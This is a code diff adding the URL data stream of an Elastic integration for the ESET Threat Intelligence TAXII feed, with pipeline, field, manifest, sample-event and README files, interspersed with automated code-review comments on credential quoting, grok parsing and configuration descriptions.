+{{/if}}
+{{#if proxy_url}}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+
+request.transforms:
+ - set:
+ target: header.Content-Type
+ value: application/taxii+json;version=2.1
+ - set:
+ target: header.Accept
+ value: application/taxii+json;version=2.1
+ - set:
+ target: url.params.match[type]
+ value: indicator
+ - set:
+ target: url.params.limit
+ value: {{page_size}}
+ - set:
+ target: url.params.added_after
+ value: '[[ .cursor.timestamp ]]'
+ default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]'
+
+response.pagination:
+ - set:
+ target: url.params.added_after
+ value: >-
+ [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]]
+ fail_on_template_error: true
+
+response.split:
+ target: body.objects
+
+cursor:
+ timestamp:
+ value: >-
+ [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]]
+ ignore_empty_value: true
+
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/ti_eset/data_stream/url/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/url/elasticsearch/ilm/default_policy.json
new file mode 100644
index 00000000000..459c9fffc4e
--- /dev/null
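Review bot: `auth.basic.user: {{username}}` and `auth.basic.password: {{password}}` are rendered as bare YAML scalars, so a credential that begins with `*`, `&`, `[`, `{` or `#`, or contains `: `, produces a config that fails to load or silently carries a different value than the one the user entered; quoting the rendered values, `auth.basic.password: "{{password}}"`, keeps them opaque (the same consideration applies to `request.proxy_url: {{proxy_url}}`, the other value a user may embed credentials in). Neither `username` nor `password` is declared among this data stream's variables, so they presumably come from the package-level manifest outside this diff; it is worth confirming there that both are marked as secret so Fleet does not store them in plaintext policy. The pagination and cursor templates look consistent with each other, and `fail_on_template_error: true` on the pagination step is the right default for a feed cursor.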
+++ b/packages/ti_eset/data_stream/url/elasticsearch/ilm/default_policy.json
@@ -0,0 +1,23 @@
+{
+ "policy": {
+ "phases": {
+ "delete": {
+ "actions": {
+ "delete": {}
+ },
+ "min_age": "7d"
+ },
+ "hot": {
+ "actions": {
+ "rollover": {
+ "max_age": "2d",
+ "max_size": "50gb"
+ },
+ "set_priority": {
+ "priority": 100
+ }
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/url/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/url/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..3485968b65a
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,147 @@
+---
+description: Pipeline for processing URL collection feed
+processors:
+ - set:
+ field: ecs.version
+ value: '8.11.0'
+ - set:
+ field: event.kind
+ value: enrichment
+ - append:
+ field: event.category
+ value: threat
+ allow_duplicates: false
+ - append:
+ field: event.type
+ value: indicator
+ allow_duplicates: false
+ - set:
+ field: threat.indicator.provider
+ value: eset
+ - rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+ if: ctx.event?.original == null
+ - json:
+ field: event.original
+ target_field: eti
+ - drop:
+ if: ctx.eti?.type != 'indicator'
+ - set:
+ field: threat.feed.name
+ value: "ESET URL stix 2.1"
+ - date:
+ field: eti.created
+ target_field: "@timestamp"
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.created != null"
+ - date:
+ field: eti.modified
+ target_field: threat.indicator.last_seen
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.modified != null"
+ - set:
+ field: threat.indicator.modified_at
+ copy_from: threat.indicator.last_seen
+ if: "ctx.threat?.indicator?.last_seen != null"
+ - date:
+ field: eti.valid_until
+ target_field: eset.valid_until
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.valid_until != null"
+ - rename:
+ field: eti.id
+ target_field: eset.id
+ ignore_missing: true
+ - rename:
+ field: eti.description
+ target_field: threat.indicator.description
+ ignore_missing: true
+ - foreach:
+ field: eti.labels
+ processor:
+ append:
+ field: eset.labels
+ value: "{{_ingest._value}}"
+ ignore_missing: true
+ ignore_failure: true
+ if: ctx.eti?.labels != null
+ - script:
+ lang: painless
+ params:
+ "malicious-activity": 'High'
+ "phishing-activity": 'High'
+ "unwanted-activity": 'Medium'
+ "benign": 'Low'
+ if: ctx.eset?.labels != null
+ source: >
+ for (def label : ctx.eset.labels) {
+ if (params.containsKey(label)) {
+ ctx.threat.indicator.confidence = params.get(label);
+ break;
+ }
+ }
+ - split:
+ field: eti.pattern
+ target_field: eti._patterns
+ separator: ' OR '
+ ignore_missing: true
+ - foreach:
+ field: eti._patterns
+ processor:
+ grok:
+ field: _ingest._value
+ patterns:
+ - "^\\[url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?"
+ ignore_failure: true
+ - set:
+ field: threat.indicator.type
+ value: url
+ - set:
+ field: threat.indicator.name
+ copy_from: eti.name
+ if: "ctx.eti?.name != null"
+ - remove:
+ field:
+ - eti
+ ignore_missing: true
+ - remove:
+ field: event.original
+ if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ ignore_failure: true
+ ignore_missing: true
+ - script:
+ tag: script_to_drop_null_values
+ lang: painless
+ description: Drops null/empty values recursively.
+ source: |-
+ boolean drop(Object o) {
+ if (o == null || o == '') {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+ - append:
+ field: event.kind
+ value: pipeline_error
+ allow_duplicates: false
+ if: ctx.error?.message != null
+on_failure:
+ - set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
diff --git a/packages/ti_eset/data_stream/url/fields/agent.yml b/packages/ti_eset/data_stream/url/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/fields/agent.yml
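Review bot: The `split` of `eti.pattern` on `' OR '` cannot do what it is there for, because the grok pattern in the following `foreach` is anchored on `^\\[url:value`: if ESET ever emits a compound pattern of the form `[url:value = 'a' OR url:value = 'b']`, every fragment after the first starts with `url:value`, fails the anchor, and is dropped silently under `ignore_failure: true`. Making the bracket optional, `- "^\\[?url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?"`, lets later fragments match, but each match then overwrites the scalar `threat.indicator.url.original`, so either the extra URLs need to be collected into a list field or the "first URL wins" behaviour should be stated in the pipeline `description`. Separately, `threat.indicator.type: url` is set unconditionally, so an object whose pattern did not parse is still indexed as a URL indicator with no `threat.indicator.url.original`; guarding it with `if: ctx.threat?.indicator?.url?.original != null` keeps the type consistent with what was actually extracted, and the `foreach` grok with `ignore_failure: true` then has a visible failure mode (a missing type) rather than none.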
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/data_stream/url/fields/base-fields.yml b/packages/ti_eset/data_stream/url/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/data_stream/url/fields/ecs.yml b/packages/ti_eset/data_stream/url/fields/ecs.yml
new file mode 100644
index 00000000000..d3f9633c4c9
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/fields/ecs.yml
@@ -0,0 +1,36 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/data_stream/url/fields/fields.yml b/packages/ti_eset/data_stream/url/fields/fields.yml
new file mode 100644
index 00000000000..bf7e7383df2
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/fields/fields.yml
@@ -0,0 +1,21 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
+- name: labels.is_ioc_transform_source
+ type: constant_keyword
+ value: 'true'
+ description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators.
diff --git a/packages/ti_eset/data_stream/url/lifecycle.yml b/packages/ti_eset/data_stream/url/lifecycle.yml
new file mode 100644
index 00000000000..326b14e00f6
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/lifecycle.yml
@@ -0,0 +1 @@
+data_retention: 7d
diff --git a/packages/ti_eset/data_stream/url/manifest.yml b/packages/ti_eset/data_stream/url/manifest.yml
new file mode 100644
index 00000000000..fe7f03aff9c
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/manifest.yml
@@ -0,0 +1,95 @@
+title: "URL"
+type: logs
+ilm_policy: logs-ti_eset.url-default_policy
+streams:
+ - input: httpjson
+ title: URL
+ description: Collect data from ETI URL feed
+ template_path: httpjson.yml.hbs
+ vars:
+ - name: url
+ description: URL with API root and identifier of URL collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514)
+ type: text
+ title: Collection URL
+ multi: false
+ required: true
+ show_user: true
+ default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/1d3208c143be49da8130f5a66fd3a0fa/objects/
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: false
+ default: 1m
+ - name: proxy_url
+ type: text
+ title: Proxy URL
+ multi: false
+ required: false
+ show_user: false
+ description: URL to proxy connections in the form of http\[s\]://:@:
+ - name: interval
+ type: text
+ title: Interval
+ description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 1h
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ multi: false
+ required: true
+ show_user: false
+ default: 48h
+ description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s.
+ - name: page_size
+ type: integer
+ multi: false
+ required: false
+ default: "1000"
+ show_user: false
+ title: Page size
+ description: Maximum number of records to pull in one request.
+ - name: ssl
+ type: yaml
+ title: SSL
+ multi: false
+ required: false
+ show_user: false
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - eset-url
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+
diff --git a/packages/ti_eset/data_stream/url/sample_event.json b/packages/ti_eset/data_stream/url/sample_event.json
new file mode 100644
index 00000000000..015da599a17
--- /dev/null
+++ b/packages/ti_eset/data_stream/url/sample_event.json
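Review bot: The `ssl` variable near the end of the vars list is the only input setting without a `description`, so a user editing the policy gets no hint that it carries the TLS settings for the TAXII connection or that loosening verification weakens the integrity of a feed that drives enrichment and detections. A one-line description such as `description: TLS settings for the connection to the TAXII server (for example certificate_authorities and verification_mode). Keep certificate verification enabled; for a private CA add it under certificate_authorities rather than disabling verification.` would cover that; the exact keys accepted depend on httpjson.yml.hbs, which is not in this hunk. The `proxy_url` description reads `http\[s\]://:@:` here, which looks like the user, password, host and port placeholders were lost — worth confirming against the source, and worth a note that credentials embedded in the proxy URL end up in the agent policy. The ESET username and password mentioned in the README are not among this data stream's vars, so they are presumably package-level variables defined in the top-level manifest.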
@@ -0,0 +1,69 @@ +{ + "@timestamp": "2023-10-19T02:00:13.000Z", + "agent": { + "ephemeral_id": "47910f1c-df41-4011-adb3-74b1ad882384", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.url", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--8986619a-150b-453c-aaa8-bfe8694d05cc", + "labels": [ + "benign" + ], + "valid_until": "2023-10-21T02:00:13.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:23:28.010Z", + "dataset": "ti_eset.url", + "ingested": "2024-03-27T14:23:40Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:13.000Z\",\"description\":\"Host actively distributes high-severity threat in the form of executable code.\",\"id\":\"indicator--8986619a-150b-453c-aaa8-bfe8694d05cc\",\"labels\":[\"benign\"],\"modified\":\"2023-10-19T02:00:13.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:13Z\",\"valid_until\":\"2023-10-21T02:00:13Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-url" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-19T02:00:13.000Z", + "modified_at": "2023-10-19T02:00:13.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": 
"https://example.com/some/path" + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/docs/README.md b/packages/ti_eset/docs/README.md new file mode 100644 index 00000000000..144a8a35c39 --- /dev/null +++ b/packages/ti_eset/docs/README.md 
@@ -0,0 +1,1120 @@ +# ESET Threat Intelligence Integration + +This integration connects with the [ESET Threat Intelligence](https://eti.eset.com/taxii2/) TAXII version 2 server. +It includes the following datasets for retrieving logs: + +| Dataset | TAXII2 Collection name | +|--------:|:-----------------------| +| apt | apt stix 2.1 | +| botnet | botnet stix 2.1 | +| cc | botnet.cc stix 2.1 | +| domains | domain stix 2.1 | +| files | file stix 2.1 | +| ip | ip stix 2.1 | +| url | url stix 2.1 | + +## Expiration of Indicators of Compromise (IOCs) +The ingested IOCs expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for every source index to +facilitate only active IOCs be available to the end users. Each transform creates a destination index named `logs-ti_eset_latest.dest_*` which only contains active and unexpired IOCs. +Destinations indices are aliased to `logs-ti_eset_latest.`. + +| Source Datastream | Destination Index Pattern | Destination Alias | +|:-------------------------|:-----------------------------------|-----------------------------| +| `logs-ti_eset.apt-*` | logs-ti_eset_latest.dest_apt-* | logs-ti_eset_latest.apt | +| `logs-ti_eset.botnet-*` | logs-ti_eset_latest.dest_botnet-* | logs-ti_eset_latest.botnet | +| `logs-ti_eset.cc-*` | logs-ti_eset_latest.dest_cc-* | logs-ti_eset_latest.cc | +| `logs-ti_eset.domains-*` | logs-ti_eset_latest.dest_domains-* | logs-ti_eset_latest.domains | +| `logs-ti_eset.files-*` | logs-ti_eset_latest.dest_files-* | logs-ti_eset_latest.files | +| `logs-ti_eset.ip-*` | logs-ti_eset_latest.dest_ip-* | logs-ti_eset_latest.ip | +| `logs-ti_eset.url-*` | logs-ti_eset_latest.dest_url-* | logs-ti_eset_latest.url | + +### ILM Policy +ILM policy is added to the source indices, so it doesn't lead to unbounded growth. 
+Data in these source indices will be deleted after a certain number of days from ingested days: + +| Index | Deleted after | Expired after | +|-----------------------:|:--------------|---------------| +| `logs-ti_eset.apt` | 365d | 365d | +| `logs-ti_eset.botnet` | 7d | 48h | +| `logs-ti_eset.cc` | 7d | 48h | +| `logs-ti_eset.domains` | 7d | 48h | +| `logs-ti_eset.files` | 7d | 48h | +| `logs-ti_eset.ip` | 7d | 48h | +| `logs-ti_eset.url` | 7d | 48h | + +## Requirements + +Elastic Agent must be installed. +For more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, +and manage your agents in a central location. +We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, +you install Elastic Agent and manually configure the agent locally on the system where it’s installed. +You are responsible for managing and upgrading the agents. +This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. +Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, +and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. 
+ +## Setup + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations. +2. In "Search for integrations" search bar, type ESET Threat Intelligence. +3. Click on the "ESET Threat Intelligence" integration from the search results. +4. Click on the "Add ESET Threat Intelligence" button to add the integration. +5. Configure all required integration parameters, including username and password that you have received from ESET during onboarding process. For more information, please visit [ESET Threat Intelligence](https://www.eset.com/int/business/services/threat-intelligence/) page. +6. Enable data streams you are interested in and have access to. +7. Save the integration. + +## Logs + +### Botnet + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. 
| constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| eset.id | The UID of the event object. | keyword | +| eset.labels | Threat labels. | keyword | +| eset.valid_until | Event expiration date. | date | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. 
It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. 
| keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| threat.feed.name | The name of the threat feed in UI friendly format. 
| keyword | +| threat.indicator.confidence | Identifies the vendor-neutral confidence rating using the None/Low/Medium/High scale defined in Appendix A of the STIX 2.1 framework. Vendor-specific confidence scales may be added as custom fields. | keyword | +| threat.indicator.description | Describes the type of action conducted by the threat. | keyword | +| threat.indicator.file.hash.md5 | MD5 hash. | keyword | +| threat.indicator.file.hash.sha1 | SHA1 hash. | keyword | +| threat.indicator.file.hash.sha256 | SHA256 hash. | keyword | +| threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | +| threat.indicator.provider | The name of the indicator's provider. | keyword | +| threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | +| threat.indicator.url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| threat.indicator.url.original.text | Multi-field of `threat.indicator.url.original`. 
